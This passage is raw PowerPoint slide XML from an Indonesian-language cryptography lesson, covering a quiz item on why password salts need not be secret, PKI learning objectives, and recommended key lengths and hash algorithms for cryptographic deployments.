              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data lama.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. True or false? It is essential to keep a salt value completely secret to prevent recovery of a password from its hash.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>False.</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i="1" dirty="0"/>
              <a:t>Salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirahasiakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keunikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password hash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>rainbow table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>hashing algorithm secret (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> pepper)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15327861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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meringkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk/file/database/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbiasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Buat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewajibkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: RSA 2.048-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECC 256-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: RSA 2.048-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECDHE 256-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: AES-128 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES-256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hashing: SHA256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SHA512 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MD5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
